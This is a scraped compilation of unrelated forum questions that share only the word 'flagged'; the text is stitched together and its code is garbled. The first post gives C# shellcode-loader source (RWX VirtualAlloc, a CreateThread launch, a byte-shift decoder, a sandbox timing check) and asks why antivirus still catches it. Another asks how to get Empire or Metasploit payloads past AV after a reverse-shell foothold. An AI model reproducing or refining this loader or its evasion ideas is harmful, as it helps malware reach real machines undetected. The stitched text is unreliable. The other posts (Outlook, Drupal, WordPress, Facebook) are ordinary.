windows – Explanation why this code is getting flagged

I am very new to this area, just started as a hobby. So eventually I saw metasploit and started using it but then I realized Windows Defender Flagging all my exes. So I copied a csharp lines to inject shellcode as raw and encrypt it and even adding a sleep timer, I am still not sure why a lot of AVs are detecting it. I tried using DefenderCheck.exe to see what signature could be flagging but it shows the binary is good.
Here is the code any help is appreciated 🙂

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Net;
using System.Text;
using System.Threading;

namespace DecryptRunner
    class Program
        (DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true))
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
        uint flAllocationType, uint flProtect);
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes,
        uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,
        uint dwCreationFlags, IntPtr lpThreadId);
        static extern UInt32 WaitForSingleObject(IntPtr hHandle,
        UInt32 dwMilliseconds);
        static extern void Sleep(uint dwMilliseconds);

        static void Main(string() args)
            byte() message = new byte(381) {<shell code here>};
            DateTime t1 = DateTime.Now;
            double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
            if (t2 < 1.5)

            for (int i = 0; i < message.Length; i++)
                message(i) = (byte)(((uint)message(i) - 24) & 0xFF);
            int kilo = message.Length;

            IntPtr address = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
            Marshal.Copy(message, 0, address, kilo);

            IntPtr oroc = CreateThread(IntPtr.Zero, 0, address, IntPtr.Zero, 0, IntPtr.Zero);

            WaitForSingleObject(oroc, 0xFFFFFFFF);   

Just help me understand what is wrong here that triggers AVs ^_^ …..
Here is the virus total submission :

Search for flagged emails from the Outlook search bar/field (Ctrl+E)

I initially posted this on the Microsoft Answers site.

I like typing complex search criteria into the Outlook 2013 search bar rather than navigating the GUI and buttons to create a query. The syntax for the search bar is exemplified here:


What is the syntax for flagged messages? Neither of the following seems to work:

  • flagged:yes
  • flag:yes


P.S. My experience thus far is that the search bar/field syntax is the same for Outlook desktop apps and web apps. If there is an answer to this, I will be using it for both methods of email access.

My listings keep getting flagged on Facebook Marketplace

I am having a huge issue with Facebook Marketplace. Every single listing I post is getting flagged for violating their terms of service. It is causing serious issues with me using the platform. I make gaming pc’s and marketplace is the best platform to sell them on. I am a community trusted seller on the platform but right now I cannot even get a listing to go live. Here is an example listing that is getting flagged.

Here is another excellent plug and play build from an experienced pc
builder. This is a great starter gaming pc. Fans are addressable rgb
but only do solid colors (No rainbow effects).

(Tower Only)

Specs: I7 3770
16gb ram
250gb ssd boot drive
2tb storage drive
EVGA 500w 80plus bronze power supply
MSI H61M-P23 (B3) motherboard

Comes with wifi/bluetooth adapter Windows 10 Pro (Fresh Install and
all drivers and updates have been installed)

All components have been stress tested and benchmarked. I posted some
game benchmarks in the images above to give some reference of the
machines performance.

Feel free to message me with any questions and thanks for looking.

Cash only. No trades.

There is no way to contact facebook about the issue. I have posted on the facebook help forum but that is obviously useless because nobody actually answers questions on there. Facebook support is absolutely non-existent. It is messing with my bottom line and has become extremely frustrating.

Is there anyone out there who may have an explanation as to why this is happening or may have a contact at facebook so I can get this issue resolved.

8 – How to create a view showing Users who have flagged AND are flagged by the current user

Flags are one way, so you can’t have a “two-way flagging”.

In Drupal 8/9, a flag always has a target entity.

So, if user A flags user B and user B flags user A, you have two flags:

  • User A’s flag of User B
  • User B’s flag of User A

I can’t think of a good way to do this in Views without custom code.

An alternative would be something like the Friend Flag module, which implements “friending” functionality (or Tinder mutual-swipe-to-match functionality).

Having implemented functionality like this before in Drupal 7, in Drupal 8/9, I would consider writing code in the _flagging_insert() hook that checks when a user flags another user and determines whether the flagged user has flagged the flagging user. If so, create an entity (could be a node with entity references to both users or a custom entity if you want to get fancy) of type Friend or Match or whatever, and then sort the matches that way in Views. Of course, if users can unflag each other and break the match, you have to add code to support that case, too.

wordpress – Site displaying Internal Server Error 500 just as suspicious comments flagged as spam

In my 13 years of WordPress, I’ve never seen anything like this. About an hour ago I was alerted by one of my users that the website was displaying an Internal Server Error 500 message on every page. I consulted my host’s tech support, and they were unable to determine the cause. I then noticed that I had about 20 comments in the moderation queue, all of which are very suspicious (see screenshot). I have no idea what to do. The website will load intermittently but it is very slow. I’m not sure what’s going on, and I have no idea what to do. Any help would be greatly appreciated.

enter image description here

malware – What’s the point of Empire if all payloads get flagged?

I’ve been reading about how powerful frameworks such as Empire and Metasploit are but I’m confused about something.

Say I gain access through a custom reverse-shell which I self-coded (so it bypasses AVs). Now, for privilege escalation, I want to have a meterpreter/Empire session.

How can I do that if the payload generated gets instantly removed by the AV?

Is it possible for someone to location spoof (such as a VPN or other) to not be flagged when logging into personal accounts (for example Facebook)?

I just logged into my FB account from a different location as usual and received a message that my account was locked down due to that attempt from an unknown location. This spiked my curiosity, and I’m wondering, if I was able to change my location to my home address using a VPN (not even sure you can be that specific or not,) would I then be able to log into my account with no issue? I’m sure this is something that’s been thought of, but I’m just curious how they would determine that I’m not actually there?

HELP Google Search Console Flagged As Malware

Hi I'm having An Issue With My Website Being Flagged As Malware, Any Help In Figuring Out Why This Is Happening Would Be Greatly Appreciated
Attached Are 2 images but bigger files (Exceed Upload Limit) Are On A Help Post On Facebook

Not Sure If This Is The Right Place To Post This

View attachment 260103

View attachment 260104

8 – With a view of flaggings, how do I get the flagged entity?

I want to create a view of flaggings and show content from the flagged entity.

However, on a flaggings view (Flag 4.x, Drupal 8/9), when I try to add a relationship, I can only add a relationship to the User, not the flagged entity.

Is this functionality not available in Flag?

When I create a view of nodes and want to pull in the flags, all I have to do is add a relationship to the Flag and it pulls in the flaggings automatically. So the Flag module supports going from nodes to flaggings, but how do I go from a view of flaggings to the flagged nodes?

Why I am trying to do this

Normally, I would just go from nodes to flaggings. However, this time, I have three different flags, and the same node may be flagged by multiple flags, and I want to show an entry for the node for each flagging, not one entry for the node for all flaggings.